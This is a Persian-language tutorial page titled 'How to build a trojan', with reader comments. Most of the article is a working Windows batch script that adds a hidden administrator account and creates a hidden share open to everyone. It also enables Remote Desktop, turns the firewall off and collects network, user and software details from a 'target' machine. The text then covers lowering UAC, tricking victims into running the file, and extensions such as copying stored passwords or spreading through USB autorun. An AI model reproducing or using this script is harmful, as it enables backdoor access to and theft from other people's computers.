جدیدترین مطالب انجمن

آموزش ساخت تروجان

03 خرداد 1395
(2 رای‌ها)
نویسنده: 

تروجان یا trojan یک نوع بد افزار میباشد که تفاوتی با ویروس دارد تروجان در واقع برای دزدین اطلاعات و نفوذ به کامپیوتر دیگر کاربران استفاده میشود که امروز باتوجه به درخواست متعدد کاربران آموزش ساخت تروجان بر روی سایت آپدیت کده قرار داده شده است این تروجان با استفاده از cmd عمل میکند و یک تروجان ساده و بی خطر است که وظیفه اون جمع کردن یک سری اطلاعات برای ما و راه دسترسی به اطلاعات دیگر است پس با ما همراه باشید با ساخت تروجان...

 آموزش ساخت تروجان

 

 

قبل از هرچیزی به این نکته دقت کنید که این آموزش صرفا جنبه آموزش دارد و به درخواست کاربران سایت قرار داده شده است

 

تروجان ما چه کارهایی انجام می دهد؟

1. ایجاد یک User جدید با دسترسی Admin در کامپیوتر هدف

2. ایجاد یک پوشه مخفی در درایو ویندوز و Share کردن آن به صورت مخفی با دسترسی User جدید.

3. فعال کردن Sharing

4. فعال سازی قابلیت Remote Desktop در کامپیوتر هدف

5. خاموش کردن Password Protected File Sharing

6. خاموش کردن فایروال

7. جمع آوری اطلاعات کامپیوتر شامل موارد زیر:

IP ،Computer Name ، MAC Address ، لیست کاربران، لیست منابع Share شده

و انتقال آن ها به پوشه share شده در درایو ویندوز با نام همان کامپیوتر

8. لیست برنامه های نصب شده و ورژن آن در کامپیوتر هدف


قبل از شروع:

مواردی که در این مقاله گفته شده فقط جنبه آموزشی دارد و استفاده نادرست از آن به عهده کاربر است.

در این آموزش فقط از فرمان های CMD استفاده شده و از هیچ زبان برنامه نویسی و ابزار خاصی استفاده نشده است.


شروع ساخت Trojan

یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:

1 – ایجاد یک User جدید با دسترسی Admin

Net user updatekade 123456 /add

Net localgroup administrators updatekade /add


2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز

Mkdir c:\updatekade-folder

:C

\cd

attribupdatekade-folder +h

2 – ب – Share کردن آن پوشه به صورت مخفی

net share trojan-share$=c:\updatekade-folder /grant:updatekade,full /grant:everyone,full


3 – فعال کردن File and Printer Sharing

netsh firewall set service type = fileandprint mode =enable


4 – فعال کردن Remote Desktop در کامپیوتر هدف

netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


5 – به عهده شما ! ( می توانید این مورد را حذف کنید )


6 – خاموش کردن فایروال

Netsh advfirewall set allprofile state off


7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator

ipconfig >>c:\updatekade-folder\%computername%.txt

getmac >>c:\updatekade-folder\%computername%.txt

net user >>c:\updatekade-folder\%computername%.txt

net share >>c:\updatekade-folder\%computername%.txt

wmic useraccount where name='administrator' get sid >>c:\updatekade-folder\%computername%.txt


8 – لیست برنامه های نصب شده بر روی سیستم هدف

Wmic product get name,version >> c:\updatekade-folder\%computername%.txt

 

9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.

10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.

آموزش ساخت تروجان
نمایی از محتویات فایل dear-tro.bat در برنامه notepad

آموزش ساخت Trojan با فرمان های CMD 

آموزش ساخت تروجان
مرحله هیجان انگیز کار

برای اطمینان از این که Trojan کار می کند، یک بار آن را اجرا می کنیم.

آموزش ساخت تروجان

همه فرمان ها با خطا روبرو می شوند!


چرا این اتفاق افتاد؟

چون فرمان هایی که در این Batch-file به کار بردیم برای اجرا شدن نیاز به دسترسی سطح Admin دارند.


حالا برای حلش چه کار کنیم؟

2 راه حل دارید!

روش اول:Batch-file را در کامپیوتر هدف Run as administrator کنید:

 آموزش ساخت تروجان

روش دوم:UAC یا User Account Control را در پایین ترین سطح قرار دهید:

1. در استارت عبارت UAC را جستجو کنید.

2. Scroll را در پایین ترین سطح قرار دهید.

 آموزش ساخت تروجان

3. کامپیوتر را یک بار Restart کنید.

حالا دوباره آن را اجرا کنید!

 آموزش ساخت تروجان

فرمان ها با موفقیت اجرا شدند!

این یعنی اینکه:

هم اکنون می توانید در کامپیوتر هدف،

· فایروال را خاموش کنید

· ریموت دسکتاپ را فعال کنید

· یک اکانت کاربری با دسترسی Admin برای خودتان ایجاد کنید

· یک پوشه Share شده با دسترسی کامل ایجاد کنید

· لیست برنامه های نصب شده و ورژن آن را در برای خود بگیرید

· لیست کاربران آن را داشته باشید و در صورت لزوم پسورد جدید برایشان قرار دهید!

کل کاری که باید انجام دهید این است که هرجوری که شده این مینی تروجان را در کامپیوتر هدف منتقل و اجرا کنید! و این نکات را در نظر داشته باشید که:

* بعضی از کاربران UAC خود را غیرفعال می کنند

* بعضی از کاربران به سادگی حرف شما را می پذیرند

* بعضی از کاربران سختگیر ترند

* ممکن است 18 درصد احتمال موفقیت برایتان وجود داشته باشد

و برای پیشرفته تر شدن تروجان کوچولو می توانید موارد زیر را به آن اضافه کنید:

· Share کردن تمام Drive ها

· گرفتن یک Copy از پسورد های ذخیره شده در ویندوز

· Share کردن یک Folder در کامپیوتر خودتان و اتصال از کامپیوتر هدف به کامیپوتر خودتان و اجرا فرمان ها

· قرار دادن این تروجان در Autorun یک Flash

 

دیدگاه (16) 5971 تعداد بازدید
امین پناهی زاده

امین پناهی زاده هستم یکی از مدیران وب سایت آپدیت کده امیدوارم از مطالب سایت بهره کافی رو ببرید

آدرس انجمن: http://updatekade.com/forum

صفحه اینستاگرام من: amin_naja

کانال تلگرام:https://telegram.me/joinchat/AAAAAD31rBqz5N0CD_TfuA

  • آموزش ساخت ویروس

    آموزش ساخت ویروس

    ویروس یک بد افزار مخرب سیستم بوده که امروزه آنتی ویروس های بیشماری در ضمینه حذف این ویروس ها منتشر شده است حالا اگه برایتان این سوال پیش آماده است که چگونه ویروس هارا میسازند و چگونه یک ویروس مخرب بسازیم با وبسایت آپدیت کده همراه باشید در این مطلب ما به شما آموزش ساخت چند نوع ویروس دستی خواهیم داد پس برای یاد گیری به ادامه مطلب مراجعه کنید.

دیدگاه‌ها  

0 # عارف 1396-03-18 20:13
یه کانال میتونید فقط در این مورد بزنید و اموزشو کامل بذارین . دیگه خبری از فیلترینگم نیست
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
-1 # pourya 1396-03-10 15:57
چطوری غیر فعالش کنم؟
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # s 1396-03-07 17:02
· گرفتن یک Copy از پسورد های ذخیره شده در ویندوز
لطفا این دستور رو اضافه کنید
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
+1 # به اسم من چیکار داری 1396-03-07 10:44
پس این تروجان به چ دردی میخوره؟؟
اصلا تروجان باید یجوری اطلاعات رو بفرسته ولی این فقط یه یوزر مسخره درست میکنه هممین :sad:
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
+2 # کاربر 1396-03-14 04:20
بنظرم اگه این کد رو بهش اضافه کنن سایت و ف....ل......تر کنن
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # taha 1396-02-29 16:53
من تروجان رو تو کامپیوتر هدف فعل کردم.حالا من چجوری برم تو یوزری که تروجان ساخت؟
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # علی 1396-02-08 09:56
من برا امتحان یسار بازش کردم حالا
چطوری اون userجدید رو پاک کنیم
یا کلا دسترسی رو قطع کنیم؟؟؟؟؟؟؟
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # امیر 1396-01-31 15:33
لطفا جواب بدید
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # امیر 1396-01-31 15:30
سلام و عرض خسته نباشید خدمت ما
این تروجان اطلاعات دریافتی را به کجا منتقل میکنه؟؟؟
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # امین پناهی زاده 1396-02-01 03:39
ارسال اطلاعات جز آموزش های ممنوعه است اما این تروجان دستورات شمارو اجرا میکنه بدین صورت با شیر کردن درایو های یک کامپیوتر میشه از طریق شبکه به اطلاعات دسترسی پیدا کرد یا با فعال کردن ریموت دسکتاپ میشه کنترل سیستم رو از راه دور به دست گرفت اما مراحل پیشرفته تر ممنوع هست
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # rty 1395-09-17 20:23
این کارا رو باید در کامپیوتر هدف انجام بدیم یا در کامپیوتر خود ؟بعد چجوری اطلاعات کامپیوتر هدف برای ما میاد باید کجا پیداش کنیم؟
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # taha 1396-02-29 16:54
منم حرفم همینه
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # مجید 1395-08-30 14:13
وقتی به کامپیوتر قربانی دسترسی ندارم چطوری uac رو غیر فعال کنم
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # امین پناهی زاده 1395-09-29 11:00
تروجان رو اصولا باید به طریقی برای قربانی فرستاد مثل این میمونه شما بخواید یه ناشناس رو که نمیشناسید و هیچ اطلاعاتی ازش ندارید هک کنید
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
+3 # hossein 1395-08-02 19:47
سلام چه دستوری باید برای انتقال اطلاعات استفاده کرد؟در این تروجان اطلاعات به چه چیزی انتقال داده میشه ؟؟
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن
0 # امین پناهی زاده 1395-09-29 10:59
ویژگی های هر کد گفته شده و ما متاسفانه بخاطر یه سری محدودیت ها نمیتونیم همه کد هارو آموزش بدیم
پاسخ دادن | پاسخ به نقل قول | نقل قول کردن

نوشتن دیدگاه

نظر شما در مورد این مطلب چیست؟


آپدیت کده

آپدیت کده

آپدیت کده

با هدف ارتقاء دانش کامپیوتری و آموزش مطالب تخصصی کامپیوتر،موبایل،اینترنت،سخت افزار،طراحی وب ، ترفندهای کامپیوتر و... در حال فعالیت میباشد 

ما فعالیت خود را از سال هزار و سیصد و نودو چهار شروع کرده که امیدواریم با حمایت شما کاربران همچنان به فعالیت خود در این زمینه ادامه دهیم

آپدیت کده را به خاطر بسپارید

بازدید کل10347046

اطلاعات مراجعه کننده

  • آی پی: 54.81.139.56
  • مرورگر: Unknown
  • نسخه مرورگر:
  • سیستم عامل: Unknown

چه کسی آنلاین است!

9
آنلاین

یکشنبه, 28 آبان 1396 14:24
بالا
برای دریافت جدیدترین برنامه ها و ترفند ها به کانال تلگرام ما بپیوندید(کلیک کنید): updatek@